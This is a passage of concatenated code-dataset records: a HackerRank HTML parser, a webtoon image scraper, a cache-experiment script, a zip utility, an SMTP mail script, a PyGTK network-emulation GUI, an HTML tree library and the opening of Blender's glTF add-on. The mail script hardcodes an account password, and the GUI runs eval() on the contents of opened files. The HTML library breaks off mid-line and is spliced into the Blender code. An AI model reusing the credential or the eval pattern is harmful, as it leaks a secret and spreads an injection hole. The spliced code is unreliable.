return\n        for attr in attrs:\n            print('->', attr[0], '>', attr[1])\n\nif __name__ == '__main__':\n    n = int(input())\n    my_html_parser = MyHTMLParser()\n    for _ in range(n):\n        my_html_parser.feed(input().strip())\n","sub_path":"hackerrank/python/regex_and_parsing/detect_html_tags_attributes_and_attribute_values.py","file_name":"detect_html_tags_attributes_and_attribute_values.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
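For reference, this is what the HackerRank solution above prints for one illustrative self-closing tag (the input is invented for demonstration; the real test input comes from stdin), assuming the MyHTMLParser class defined in the record:

parser = MyHTMLParser()
parser.feed("<input type='text' name='q'/>")
# handle_startendtag fires and prints:
#   input
#   -> type > text
#   -> name > q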
+{"seq_id":"1686816","text":"from bs4 import BeautifulSoup as bs\nimport requests, os, re\nfrom urllib.request import urlretrieve\n\nhtml = requests.get(\"https://comic.naver.com/webtoon/weekday.nhn\")\nsoup = bs(html.text, \"html.parser\")\nhtml.close()\n\ntry:\n    if not os.path.isdir(\"./images\"):\n        os.mkdir(os.path.join(\"./images\"))\nexcept OSError as e:\n    print(\"Error: failed to create the folder!!\")\n    exit()\n\ndatas = soup.select(\"div.list_area li div.thumb a img\")\nfor data in datas:\n    title = data[\"title\"]\n    src = data[\"src\"]\n    title = re.sub(\"[^0-9a-zA-Zㄱ-힗]\", \"\", title)  # replace any character outside these ranges with ''\n    urlretrieve(src, f\"./images/{title}.jpg\")  # URL, file path + file name + extension\n    # print(f\"title: {title}\\tsrc: {src} \")\n    # urlretrieve(title, f\"./images/{src}.jpg\")\n","sub_path":"basic/p04.py","file_name":"p04.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"300225708","text":"#!/usr/bin/env python\nimport os\ntry:\n    from cache import main\nexcept ImportError:\n    from .cache import main\n\ndram_multiplier = 1\nstore_to_cache = True\nkernels = ['rot']\n# kernels = ['rot', 'hflip', 'vflip']\n\nbatch_sizes = [1, 2, 4, 8, 16, 32, 64]\nsizes = [100, 250]\n\nl1_sizes = [2**n for n in range(12, 16)]  # note 2**15 = 32768\ndegrees_of_associativity = [1]\nrows_of_parallelism = [1, 4, 8]\nresults_dir = 'results/new-batch-size-test'\n# os.mkdir(results_dir)\n\nfor size in sizes:\n    for n_images in batch_sizes:\n        for kernel in kernels:\n            print('\\n' + '='*25 + '\\n' + kernel + '\\n' + '='*25 + '\\n')\n\n            # create output filename\n            out_basename = kernel + '_%sx%s' % (n_images, size) + '.csv'\n            if store_to_cache:\n                out_basename = 'store2cache_' + out_basename\n            out_filename = os.path.join(results_dir, out_basename)\n\n            results = 'time per pixel (ns),energy per pixel (nJ),rows,ways,l1_size\\n'\n            for rows in rows_of_parallelism:\n                for l1_size in l1_sizes:\n                    break_now = False\n                    for ways in degrees_of_associativity:\n\n                        config = \"rows=%s, ways=%s; l1_size=%s\" % (rows, ways, l1_size)\n                        print(config)\n                        try:\n                            time_pp, energy_pp = main(kernel=kernel,\n                                                      image_size=size,\n                                                      n_images=n_images,\n                                                      l1_ways=ways,\n                                                      l2_ways=ways,\n                                                      l1_block_size=64,\n                                                      l2_block_size=64,\n                                                      l1_size=l1_size,\n                                                      l2_size=2097152,\n                                                      parallelism=rows,\n                                                      store_to_cache=store_to_cache,\n                                                      dram_multiplier=dram_multiplier,\n                                                      verbose=False)\n                        except Exception as e:\n                            time_pp, energy_pp = 'error', 'error'\n                            print(\"Exception encountered w/ config=%s\\nException:\\n%s\"\n                                  \"\" % (config, e))\n                            break_now = True\n                        if break_now:\n                            break\n\n                        results += ('%s,%s,%s,%s,%s\\n'\n                                    '' % (time_pp, energy_pp, rows, ways, l1_size))\n\n            with open(out_filename, 'w+') as f:\n                f.write(results)\n","sub_path":"run_cache_experiment2b.py","file_name":"run_cache_experiment2b.py","file_ext":"py","file_size_in_byte":2855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"90851363","text":"import os\nimport shutil\nfrom tqdm import tqdm\n\nfrom get_codes import get_files_with_code\n\n\ndef zip_student_folders(path='.'):\n    # Path can be given in case it is not executing \n\t# from 
directory where are the files to be zipped\n if path != '.':\n os.chdir(path)\n # calling function to get all file paths in the directory\n file_paths = tqdm(get_files_with_code())\n\n # printing the list of all files to be zipped\n print('Following files will be zipped:')\n for file_name in file_paths:\n file_paths.set_description('Compressing: {:<20}'.format(file_name))\n shutil.make_archive(file_name, 'zip', file_name)\n\n print('All files zipped successfully!')\n\n\nif __name__ == \"__main__\":\n zip_student_folders()\n","sub_path":"to_zip.py","file_name":"to_zip.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"539863736","text":"#!/usr/bin/env python\n\"\"\"\nSends a email.\n\nAuthor: Javier Arellano-Vertdejo (J@Vo)\nDate: October 2018\nVersion: v1.311.18\n\"\"\"\nimport argparse\nimport smtplib\nimport sys\n\nfrom email.mime.multipart import MIMEMultipart\nfrom email.MIMEText import MIMEText\n\n\n# sender parameters\nSMTP_SERVER = 'smtp-mail.outlook.com'\nSMTP_PORT = 587\nSMTP_SENDER = 'akbal.ecosur@outlook.com'\nSMTP_PASSWORD = \"a1k2b3a4l5\"\n\n\ndef sendMail(mail_subject, mail_to, mail_message):\n \"\"\"\n Send a email message.\n\n @params:\n mail_subject - Required : subject of mail\n mail_to - Required : dest of mail\n mail_message - Required : message of mail\n \"\"\"\n msg = MIMEMultipart()\n msg['Subject'] = mail_subject\n msg['To'] = mail_to\n msg['From'] = SMTP_SENDER\n\n part = MIMEText('text', \"plain\")\n part.set_payload(mail_message)\n msg.attach(part)\n\n # sets parameters to send email\n session = smtplib.SMTP(SMTP_SERVER, SMTP_PORT)\n session.ehlo()\n session.starttls()\n session.ehlo\n\n # login using sender parameters\n session.login(SMTP_SENDER, SMTP_PASSWORD)\n qwertyuiop = msg.as_string()\n\n # sends email\n session.sendmail(SMTP_SENDER, mail_to, qwertyuiop)\n\n # close session\n session.quit()\n\n\ndef main(argv):\n \"\"\"\n Call the process function with the parameter list.\n\n @params:\n argv - Required : command line argument list (List)\n \"\"\"\n ap = argparse.ArgumentParser()\n\n ap.add_argument(\"-s\", \"--subject\", required=True,\n help=\"subject of mail\")\n ap.add_argument(\"-t\", \"--to\", required=True,\n help=\"dest\")\n ap.add_argument(\"-m\", \"--message\", required=True,\n help=\"message of mail\")\n\n args = vars(ap.parse_args())\n\n mail_subject = args['subject']\n mail_to = args['to']\n mail_message = args['message']\n\n # send the email\n sendMail(mail_subject, mail_to, mail_message)\n\n\nif __name__ == '__main__':\n \"\"\"\n Use example.\n\n sendmail.py -s \"subject\" -t \"javier.arellano@mail.ecosur.mx\" -m \"message\"\n \"\"\"\n main(sys.argv[1:])\n","sub_path":"bin/sendmail.py","file_name":"sendmail.py","file_ext":"py","file_size_in_byte":2096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"624314315","text":"# -*- coding: utf-8 -*-\n\nfrom functools import wraps\nfrom random import choice\n\n\nimport pygtk\npygtk.require20()\nimport gtk\n\nfrom numpy import arange, sin, pi\n\nfrom matplotlib.figure import Figure\nfrom matplotlib.axes import Axes\nfrom matplotlib.patches import Patch\nfrom matplotlib.backends.backend_gtkcairo import FigureCanvasGTKCairo as FigureCanvas\nfrom matplotlib.backends.backend_gtkcairo import NavigationToolbar2Cairo as NavigationToolbar\n\n\nfrom emulation import emulation\nfrom utils import ignore_args\nimport defaults\n\n\nclass App(object):\n\n def 
__init__(self):\n self.builder = gtk.Builder()\n self.builder.add_from_file('ui.glade')\n\n\n self.window_main.connect('destroy', ignore_args(self.quit))\n self.action_quit.connect('activate', ignore_args(self.quit))\n\n self.btn_defaults.connect('clicked', ignore_args(self.defaults))\n self.del_link.connect('clicked', ignore_args(self.delete))\n self.add_link.connect('clicked', ignore_args(self.add))\n self.btn_start.connect('clicked', ignore_args(self.emulate))\n\n self.action_open.connect('activate', ignore_args(self.open_cb))\n self.action_save.connect('activate', ignore_args(self.save_cb))\n self.action_about.connect('activate', ignore_args(self.about_cb))\n\n\n self.figure1 = Figure(figsize=(10, 10), dpi=111)\n self.canvas1 = FigureCanvas(self.figure1) # a gtk.DrawingArea\n self.plot1.pack_start(self.canvas1, True, True, 0)\n\n self.figure2 = Figure(figsize=(10, 10), dpi=111)\n self.canvas2 = FigureCanvas(self.figure2) # a gtk.DrawingArea\n self.plot2.pack_start(self.canvas2, True, True, 0)\n\n toolbar = NavigationToolbar(self.canvas1, self.window_main)\n self.plot1.pack_start(toolbar, False, False, 0)\n\n toolbar = NavigationToolbar(self.canvas2, self.window_main)\n self.plot2.pack_start(toolbar, False, False, 0)\n\n for i in range(4):\n column = self.links_view.get_column(i)\n cell_renderer = column.get_cell_renderers()[0]\n def edited_cb(cell, path, new_text, data):\n store, col_num = data\n if col_num == 2:\n new_text = int(new_text)\n elif col_num == 3:\n new_text = float(new_text)\n store[path][col_num] = new_text\n return\n cell_renderer.connect('edited', edited_cb, (self.links_store, i))\n\n def about_cb(self):\n self.about_dialog.run()\n self.about_dialog.hide()\n\n def open_cb(self):\n result = self.open_dialog.run()\n if result == 0:\n filename = self.open_dialog.get_filename()\n with open(filename, 'r') as f:\n try:\n o = eval(f.read())\n self.set_links(o)\n except:\n self.open_dialog.hide()\n self.bad_file()\n self.open_dialog.hide()\n\n def save_cb(self):\n result = self.save_dialog.run()\n if result == 0:\n filename = self.save_dialog.get_filename()\n with open(filename, 'w') as f:\n s = unicode(self.get_links())\n f.write(s)\n self.save_dialog.hide()\n\n def __getattr__(self, name):\n obj = self.builder.get_object(name)\n if not obj:\n raise AttributeError(\"Object {0} has no attribute {1}\".format(self, name))\n setattr(self, name, obj)\n return obj\n\n def run(self):\n self.window_main.show_all()\n gtk.main()\n\n def quit(self):\n self.window_main.destroy()\n gtk.main_quit()\n\n def defaults(self):\n self.input_duration.set_text(str(defaults.emulation_duration))\n self.input_min_lifetime.set_text(str(defaults.connection_min_lifetime))\n self.input_max_lifetime.set_text(str(defaults.connection_max_lifetime))\n self.input_connections_count.set_text(str(defaults.connections_count))\n links = defaults.links\n avail_classes = defaults.link_avail_classes\n bandwidth = defaults.wavelengths_per_link\n self.set_links([(l[0], l[1], bandwidth, choice(avail_classes)) for l in links])\n\n def set_links(self, links):\n self.links_store.clear()\n try:\n for l in links:\n self.links_store.append(l)\n except TypeError:\n self.data_error()\n\n\n def get_links(self):\n i = self.links_store.get_iter_first()\n links = []\n while i is not None:\n link = (\n self.links_store.get_value(i, 0),\n self.links_store.get_value(i, 1),\n int(self.links_store.get_value(i, 2)),\n float(self.links_store.get_value(i, 3)),\n )\n links.append(link)\n i = self.links_store.iter_next(i)\n return links\n\n 
def data_error(self):\n        self.data_error_dialog.run()\n        self.data_error_dialog.hide()\n\n    def bad_file(self):\n        self.bad_file_dialog.run()\n        self.bad_file_dialog.hide()\n\n    def delete(self):\n        store, row = self.links_view.get_selection().get_selected()\n        store.remove(row)\n\n    def add(self):\n        row = self.links_store.append([\"\", \"\", 0, 0])\n        column = self.links_view.get_column(0)\n        path = self.links_store.get_path(row)\n        self.links_view.set_cursor(path, column, True)\n\n    def emulate(self):\n\n        try:\n            duration = int(self.input_duration.get_text())\n            min_lifetime = int(self.input_min_lifetime.get_text())\n            max_lifetime = int(self.input_max_lifetime.get_text())\n            connections_count = int(self.input_connections_count.get_text())\n            if max_lifetime - min_lifetime < 1 or duration < 10 or connections_count < 10:\n                self.data_error()\n                return\n        except ValueError:\n            self.data_error()\n            return\n\n\n        links = self.get_links()\n\n        def set_progress(fraction):\n            self.progressbar1.set_fraction(fraction)\n            gtk.main_iteration()\n\n        fits = defaults.fits\n\n        stats = emulation(duration,\n                          links,\n                          min_lifetime,\n                          max_lifetime,\n                          connections_count,\n                          fits,\n                          set_progress)\n\n\n        # plot 1\n        def avail(fit):\n            for s in stats:\n                if s.fit == fit:\n                    stat = s\n            avails = []\n            for c in stat.connections:\n                avails.append(1 - (float(c.failed_time) / c.request.lifetime))\n            return sum(avails) / len(avails)\n        avails = list(map(avail, fits))\n\n        self.figure1.clear()\n\n        axes = self.figure1.add_subplot(111)\n        axes.set_ylim(0.97, 1.0)\n        axes.set_ylabel('Connection Availability')\n        axes.set_xlabel('Failure-In-Time')\n        axes.plot(fits, avails, 'o-')\n\n        self.canvas1.draw()\n\n        # plot 2\n\n        sla = {\n            0.99: [],\n            0.999: [],\n            0.9999: [],\n        }\n        for s in stats:\n            for c in s.connections:\n                sla[c.request.sla].append(c)\n        p = {\n            0.99: [0, 0, 0],  # unprotected, shared, dedicated\n            0.999: [0, 0, 0],\n            0.9999: [0, 0, 0],\n        }\n\n        for cls, stat in p.items():\n            for c in sla[cls]:\n                if c.backup is None or len(c.backup) == 0:\n                    stat[0] += 1\n                elif c.dedicated is True:\n                    stat[2] += 1\n                else:\n                    stat[1] += 1\n        print(p, stats)\n        self.figure2.clear()\n\n        labels = 'unprotected', 'shared', 'dedicated'\n        colors = 'g', 'b', 'r'\n\n        axes = Axes(self.figure2, [0, 0, 0.5, 0.5])\n        axes.set_aspect(1)\n        axes.pie(p[0.99], colors=colors, autopct='%1.1f%%')\n        axes.set_title('0.99')\n        self.figure2.add_axes(axes)\n\n        axes = Axes(self.figure2, [0.5, 0, 0.5, 0.5])\n        axes.set_aspect(1)\n        axes.pie(p[0.999], colors=colors, autopct='%1.1f%%')\n        axes.set_title('0.999')\n        self.figure2.add_axes(axes)\n\n        axes = Axes(self.figure2, [0.25, 0.4, 0.5, 0.5])\n        axes.set_aspect(1)\n        axes.pie(p[0.9999], colors=colors, autopct='%1.1f%%')\n        axes.set_title('0.9999')\n        self.figure2.add_axes(axes)\n\n        self.figure2.legend((Patch(facecolor='g'), Patch(facecolor='b'), Patch(facecolor='r')),\n                            labels)\n\n        self.canvas2.draw()\n\n\n\nif __name__ == \"__main__\":\n    App().run()\n","sub_path":"agsdp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":8653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"546798186","text":"\"\"\"\nHTMLTree Library provides a simple interface for\naccessing and manipulating HTML documents. Inspired\nby htmldom and BeautifulSoup\n\"\"\"\nimport re\nfrom htmlentitydefs import codepoint2name\n\nElementName = r'<([\\w\\d]+)'\nRestName = r'((?:\\s*[-:\\w\\d]+\\s*=\\s*(?:\\'[^\\']*\\'|\"[^\"]*\"|[^\\'\">\\s]*))*)\\s*/?>'\n\n#StartTag\nStartTag = re.compile(ElementName+RestName)\n#EndTag\nEndTag = 
re.compile(r'</[^<>]+>')\n\n#Used to split attributes into name/value pair\nAttributeSplitter = re.compile(r'(?:\\s*([\\w\\d]+)\\s*=\\s*[\\'\"]([^\\'\"]+)[\\'\"]\\s*)')\n\nWhiteSpace = re.compile(r'\\s+')\n\nEmptyElements=set([\"br\", \"hr\", \"meta\", \"link\", \n                   \"base\", \"link\", \"img\", \"embed\",\n                   \"param\", \"area\", \"col\", \"input\",\n                   \"basefont\", \"frame\", \"isindex\"])\n\nclass HTMLEntitySubstitution:\n    \"\"\"\n    Substitute HTML entities for the corresponding characters.\n    \"\"\"\n\n    def _populate_class_variable():\n        \n        lookup={}\n        for codepoint,name in list(codepoint2name.items()):\n            character=unichr(codepoint)\n            lookup[name]=character\n        return lookup\n\n    HTML_ENTITY_TO_CHARACTER=_populate_class_variable()\n    HTML_ENTITY_RE=re.compile(r'&#(\\d+?);|&(.+?);')\n    \n    @classmethod\n    def _substitute_html_entities(cls,match_obj):\n        \"\"\"\n        Used with a regular expression to substitute the\n        html entities for characters.\n        \"\"\"\n        codepoint=match_obj.group(1)\n        if codepoint:\n            return unichr(int(codepoint))\n        else:\n            return cls.HTML_ENTITY_TO_CHARACTER.get(match_obj.group(2))\n\n    @classmethod\n    def substitute_html(cls,s):\n        \"\"\"\n        Replace certain html entities with unicode character.\n        \"\"\"\n        return cls.HTML_ENTITY_RE.sub(\\\n            cls._substitute_html_entities,s)\n\n\n
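# Example: HTMLEntitySubstitution.substitute_html(u'&amp;&#65;') returns u'&A'.\n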
class Tag:\n    \"\"\"\n    Represents a HTML tag with its attributes and contents\n    \"\"\"\n    HTML_Formater=HTMLEntitySubstitution.substitute_html\n\n    def __init__(self,name,text=''):\n        \"\"\"Initialize and reset this instance.\"\"\"\n        self.name=name\n        self.text=text\n        self.reset()\n\n    def reset(self):\n        \"\"\"Reset this instance.\"\"\"\n        self.attrs={}\n        self.contents=[]\n        self.parent=None\n        self.previous_sibling=None\n        self.next_sibling=None\n        self.previous_element=None\n        self.next_element=None\n\n    def set_attrs(self,attrDict):\n        self.attrs.update(attrDict)\n\n    def get_name(self):\n        return self.name\n\n    def is_empty_element(self):\n        \"\"\"Is this tag an empty-element tag?\n        (aka a self-closing tag).\"\"\"\n        return self.name in EmptyElements\n\n    def format_string(self,s):\n        \"\"\"\n        Format the given string using class variable HTML_Formater.\n        \"\"\"\n        return self.HTML_Formater(s)\n\n    def to_string(self,indent_level=None):\n        \"\"\"Returns a string representation of this\n        tag and its contents.\"\"\"\n        \n        pretty_print=(indent_level is not None)\n\n        attr_list=[]\n\n        if self.attrs:\n            for k,v in sorted(self.attrs.items()):\n                pair=' %s=\"%s\"' % (k,v)\n                attr_list.append(pair)\n        attr_string=''.join(attr_list)\n\n        close=''\n        close_tag=''\n\n        if self.is_empty_element():\n            close='/'\n        else:\n            close_tag='</%s>' % self.name\n\n        s=[]\n        if pretty_print:\n            space=(' '*(indent_level-1))\n            indent_contents=indent_level+1\n        else:\n            space=''\n            indent_contents=None\n        s.append(space)\n        s.append('<%s%s%s>' % (self.name,attr_string,close))\n        if pretty_print:\n            s.append('\\n')\n        contents=self.contents_to_string(indent_contents)\n        s.append(contents)\n        if pretty_print and contents and contents[-1] != '\\n':\n            s.append('\\n')\n        s.append(space)\n        s.append(close_tag)\n        if pretty_print and self.next_sibling and close_tag:\n            s.append('\\n')\n        return ''.join(s) \n\n    def contents_to_string(self,indent_level=None):\n        \"\"\"Renders the contents of this tag as a string\"\"\"\n        pretty_print=(indent_level is not None)\n        contents=[]\n        for c in self:\n            if c.text:\n                if pretty_print:\n                    contents.append(' '*(indent_level-1))\n                text=self.format_string(c.text)\n                contents.append(text)\n            else:\n                string=c.to_string(indent_level)\n                contents.append(string)\n        return ''.join(contents)\n    \n\n    def prettify(self):\n        return self.to_string(True) \n\n    def descendants(self):\n        \"\"\"Generator method which returns all descendants\"\"\"\n        if len(self.contents) < 1:\n            return\n        stopNode=self.last_descendant().next_element\n        currentNode=self.contents[0]\n        while currentNode is not stopNode:\n            yield currentNode\n            currentNode=currentNode.next_element\n\n    def append(self,tag):\n        self._insert(len(self.contents),tag)\n\n\n    def last_descendant(self):\n        last_child=self\n        while last_child.contents:\n            last_child=last_child.contents[-1]\n        return last_child\n\n    def find_all(self,name):\n        \"\"\"Extracts a list of Tag objects that match the given criteria.\"\"\"\n        return [element for element in self.descendants() if element.name==name]\n\n    def _insert(self,position,new_child):\n\n        pos=min(position,len(self.contents))\n\n        if pos == 0:\n            new_child.previous_element=self\n            self.next_element=new_child\n        else:\n            previous_sibling=self.contents[-1]\n            new_child.previous_sibling=previous_sibling\n            previous_sibling.next_sibling=new_child\n            previous_element=previous_sibling.last_descendant()\n            if previous_element:\n                new_child.previous_element=previous_element\n                previous_element.next_element=new_child\n\n        self.contents.append(new_child)\n    \n\n    def __repr__(self):\n        \"\"\"Renders this tag as a string.\"\"\"\n        return self.to_string()\n\n    def __iter__(self):\n        \"\"\"Iterating tag over its contents\"\"\"\n        return iter(self.contents)\n\n    def get_text(self):\n        \"\"\"Get all child text.\"\"\"\n        string=[]\n        for c in self:\n            if c.text:\n                text=self.format_string(c.text).strip()\n                string.append(text+'\\n')\n            else:\n                if c.name == 'script' or c.name == 'style':\n                    continue\n                string.append(c.get_text())\n        return ''.join(string)\n    \n\n\nclass HTMLTreeBuilder:\n    \"\"\"Converting a html file into a dom tree\"\"\"\n    def __init__(self):\n        self.root_tag=None\n\n    def feed(self,doc,encoding='utf8'):\n        #tagStack holds parent tags.The top tag will be current's parent\n        tagStack=[]\n        comment_string='<!--'\n        while doc:\n            if doc.startswith(comment_string):\n                index=doc.find('-->')\n                #Just pass through comment tag\n                doc=doc[index+3:].strip()\n                continue\n\n            index=doc.find('<')\n\n            #len(tagStack) >= 1 means found text\n            #content between the end of a tag and the\n            #start of a new tag\n            if len(tagStack) > 0:\n                _index=-1\n                #if \"script\" element is on the top of\n                #the stack then entire content of it will\n                #be stored in a single text node\n                if tagStack[-1].get_name() == 'script':\n                    _index=doc.find('</script>')\n                    if _index != -1:\n                        tmpData=doc[:_index]\n                #if \"style\" element is on the top of\n                #the stack then entire content of it will\n                #be stored in a single text node\n                elif tagStack[-1].get_name() == 'style':\n                    _index=doc.find('</style>')\n                    if _index != -1: \n                        tmpData=doc[:_index]\n\n                else:\n                    tmpData=doc[:index]\n\n                #tmpData should not be empty\n                if tmpData:\n                    new_tag=Tag('text',tmpData)\n                    tagStack[-1].append(new_tag)\n                if _index != -1:\n                    doc=doc[_index:].strip()\n                else:\n                    doc=doc[index:].strip()\n            else:\n                doc=doc.strip()\n\n            #end of a tag\n            if doc.find('</')\n    'location': 'File > Import-Export',\n    'description': 'Import-Export as glTF 2.0',\n    'warning': '',\n    'doc_url': \"{BLENDER_MANUAL_URL}/addons/import_export/scene_gltf2.html\",\n    'tracker_url': \"https://github.com/KhronosGroup/glTF-Blender-IO/issues/\",\n    'support': 'OFFICIAL',\n    'category': 'Import-Export',\n}\n\ndef get_version_string():\n    return str(bl_info['version'][0]) + '.' + str(bl_info['version'][1]) + '.' 
+ str(bl_info['version'][2])\n\n#\n# Script reloading (if the user calls 'Reload Scripts' from Blender)\n#\n\ndef reload_package(module_dict_main):\n import importlib\n from pathlib import Path\n\n def reload_package_recursive(current_dir, module_dict):\n for path in current_dir.iterdir():\n if \"__init__\" in str(path) or path.stem not in module_dict:\n continue\n\n if path.is_file() and path.suffix == \".py\":\n importlib.reload(module_dict[path.stem])\n elif path.is_dir():\n reload_package_recursive(path, module_dict[path.stem].__dict__)\n\n reload_package_recursive(Path(__file__).parent, module_dict_main)\n\n\nif \"bpy\" in locals():\n reload_package(locals())\n\nimport bpy\nfrom bpy.props import (StringProperty,\n BoolProperty,\n EnumProperty,\n IntProperty,\n CollectionProperty)\nfrom bpy.types import Operator\nfrom bpy_extras.io_utils import ImportHelper, ExportHelper\n\n\n#\n# Functions / Classes.\n#\n\nexporter_extension_panel_unregister_functors = []\nimporter_extension_panel_unregister_functors = []\n\n\ndef ensure_filepath_matches_export_format(filepath, export_format):\n import os\n filename = os.path.basename(filepath)\n if not filename:\n return filepath\n\n stem, ext = os.path.splitext(filename)\n if stem.startswith('.') and not ext:\n stem, ext = '', stem\n\n desired_ext = '.glb' if export_format == 'GLB' else '.gltf'\n ext_lower = ext.lower()\n if ext_lower not in ['.glb', '.gltf']:\n return filepath + desired_ext\n elif ext_lower != desired_ext:\n filepath = filepath[:-len(ext)] # strip off ext\n return filepath + desired_ext\n else:\n return filepath\n\n\ndef on_export_format_changed(self, context):\n # Update the filename in the file browser when the format (.glb/.gltf)\n # changes\n sfile = context.space_data\n if not isinstance(sfile, bpy.types.SpaceFileBrowser):\n return\n if not sfile.active_operator:\n return\n if sfile.active_operator.bl_idname != \"EXPORT_SCENE_OT_gltf\":\n return\n\n sfile.params.filename = ensure_filepath_matches_export_format(\n sfile.params.filename,\n self.export_format,\n )\n\n\nclass ExportGLTF2_Base:\n # TODO: refactor to avoid boilerplate\n\n def __init__(self):\n from io_scene_gltf2.io.com import gltf2_io_draco_compression_extension\n self.is_draco_available = gltf2_io_draco_compression_extension.dll_exists()\n\n bl_options = {'PRESET'}\n\n export_format: EnumProperty(\n name='Format',\n items=(('GLB', 'glTF Binary (.glb)',\n 'Exports a single file, with all data packed in binary form. '\n 'Most efficient and portable, but more difficult to edit later'),\n ('GLTF_SEPARATE', 'glTF Separate (.gltf + .bin + textures)',\n 'Exports multiple files, with separate JSON, binary and texture data. '\n 'Easiest to edit later'),\n ('GLTF_EMBEDDED', 'glTF Embedded (.gltf)',\n 'Exports a single file, with all data packed in JSON. '\n 'Less efficient than binary, but easier to edit later')),\n description=(\n 'Output format and embedding options. 
Binary is most efficient, '\n 'but JSON (embedded or separate) may be easier to edit later'\n ),\n default='GLB',\n update=on_export_format_changed,\n )\n\n ui_tab: EnumProperty(\n items=(('GENERAL', \"General\", \"General settings\"),\n ('MESHES', \"Meshes\", \"Mesh settings\"),\n ('OBJECTS', \"Objects\", \"Object settings\"),\n ('ANIMATION', \"Animation\", \"Animation settings\")),\n name=\"ui_tab\",\n description=\"Export setting categories\",\n )\n\n export_copyright: StringProperty(\n name='Copyright',\n description='Legal rights and conditions for the model',\n default=''\n )\n\n export_image_format: EnumProperty(\n name='Images',\n items=(('AUTO', 'Automatic',\n 'Save PNGs as PNGs and JPEGs as JPEGs. '\n 'If neither one, use PNG'),\n ('JPEG', 'JPEG Format (.jpg)',\n 'Save images as JPEGs. (Images that need alpha are saved as PNGs though.) '\n 'Be aware of a possible loss in quality'),\n ),\n description=(\n 'Output format for images. PNG is lossless and generally preferred, but JPEG might be preferable for web '\n 'applications due to the smaller file size'\n ),\n default='AUTO'\n )\n\n export_texture_dir: StringProperty(\n name='Textures',\n description='Folder to place texture files in. Relative to the .gltf file',\n default='',\n )\n\n export_keep_originals: BoolProperty(\n name='Keep original',\n description=('Keep original textures files if possible. '\n 'WARNING: if you use more than one texture, '\n 'where pbr standard requires only one, only one texture will be used. '\n 'This can lead to unexpected results'\n ),\n default=False,\n )\n\n export_texcoords: BoolProperty(\n name='UVs',\n description='Export UVs (texture coordinates) with meshes',\n default=True\n )\n\n export_normals: BoolProperty(\n name='Normals',\n description='Export vertex normals with meshes',\n default=True\n )\n\n export_draco_mesh_compression_enable: BoolProperty(\n name='Draco mesh compression',\n description='Compress mesh using Draco',\n default=False\n )\n\n export_draco_mesh_compression_level: IntProperty(\n name='Compression level',\n description='Compression level (0 = most speed, 6 = most compression, higher values currently not supported)',\n default=6,\n min=0,\n max=10\n )\n\n export_draco_position_quantization: IntProperty(\n name='Position quantization bits',\n description='Quantization bits for position values (0 = no quantization)',\n default=14,\n min=0,\n max=30\n )\n\n export_draco_normal_quantization: IntProperty(\n name='Normal quantization bits',\n description='Quantization bits for normal values (0 = no quantization)',\n default=10,\n min=0,\n max=30\n )\n\n export_draco_texcoord_quantization: IntProperty(\n name='Texcoord quantization bits',\n description='Quantization bits for texture coordinate values (0 = no quantization)',\n default=12,\n min=0,\n max=30\n )\n\n export_draco_color_quantization: IntProperty(\n name='Color quantization bits',\n description='Quantization bits for color values (0 = no quantization)',\n default=10,\n min=0,\n max=30\n )\n\n export_draco_generic_quantization: IntProperty(\n name='Generic quantization bits',\n description='Quantization bits for generic coordinate values like weights or joints (0 = no quantization)',\n default=12,\n min=0,\n max=30\n )\n\n export_tangents: BoolProperty(\n name='Tangents',\n description='Export vertex tangents with meshes',\n default=False\n )\n\n export_materials: EnumProperty(\n name='Materials',\n items=(('EXPORT', 'Export',\n 'Export all materials used by included objects'),\n ('PLACEHOLDER', 'Placeholder',\n 'Do 
not export materials, but write multiple primitive groups per mesh, keeping material slot information'),\n ('NONE', 'No export',\n 'Do not export materials, and combine mesh primitive groups, losing material slot information')),\n description='Export materials ',\n default='EXPORT'\n )\n\n export_colors: BoolProperty(\n name='Vertex Colors',\n description='Export vertex colors with meshes',\n default=True\n )\n\n use_mesh_edges: BoolProperty(\n name='Loose Edges',\n description=(\n 'Export loose edges as lines, using the material from the first material slot'\n ),\n default=False,\n )\n\n use_mesh_vertices: BoolProperty(\n name='Loose Points',\n description=(\n 'Export loose points as glTF points, using the material from the first material slot'\n ),\n default=False,\n )\n\n export_cameras: BoolProperty(\n name='Cameras',\n description='Export cameras',\n default=False\n )\n\n # keep it for compatibility (for now)\n export_selected: BoolProperty(\n name='Selected Objects',\n description='Export selected objects only',\n default=False\n )\n\n use_selection: BoolProperty(\n name='Selected Objects',\n description='Export selected objects only',\n default=False\n )\n\n use_visible: BoolProperty(\n name='Visible Objects',\n description='Export visible objects only',\n default=False\n )\n\n use_renderable: BoolProperty(\n name='Renderable Objects',\n description='Export renderable objects only',\n default=False\n )\n\n use_active_collection: BoolProperty(\n name='Active Collection',\n description='Export objects in the active collection only',\n default=False\n )\n\n export_extras: BoolProperty(\n name='Custom Properties',\n description='Export custom properties as glTF extras',\n default=False\n )\n\n export_yup: BoolProperty(\n name='+Y Up',\n description='Export using glTF convention, +Y up',\n default=True\n )\n\n export_apply: BoolProperty(\n name='Apply Modifiers',\n description='Apply modifiers (excluding Armatures) to mesh objects -'\n 'WARNING: prevents exporting shape keys',\n default=False\n )\n\n export_animations: BoolProperty(\n name='Animations',\n description='Exports active actions and NLA tracks as glTF animations',\n default=True\n )\n\n export_frame_range: BoolProperty(\n name='Limit to Playback Range',\n description='Clips animations to selected playback range',\n default=True\n )\n\n export_frame_step: IntProperty(\n name='Sampling Rate',\n description='How often to evaluate animated values (in frames)',\n default=1,\n min=1,\n max=120\n )\n\n export_force_sampling: BoolProperty(\n name='Always Sample Animations',\n description='Apply sampling to all animations',\n default=True\n )\n\n export_nla_strips: BoolProperty(\n name='Group by NLA Track',\n description=(\n \"When on, multiple actions become part of the same glTF animation if \"\n \"they're pushed onto NLA tracks with the same name. \"\n \"When off, all the currently assigned actions become one glTF animation\"\n ),\n default=True\n )\n\n export_def_bones: BoolProperty(\n name='Export Deformation 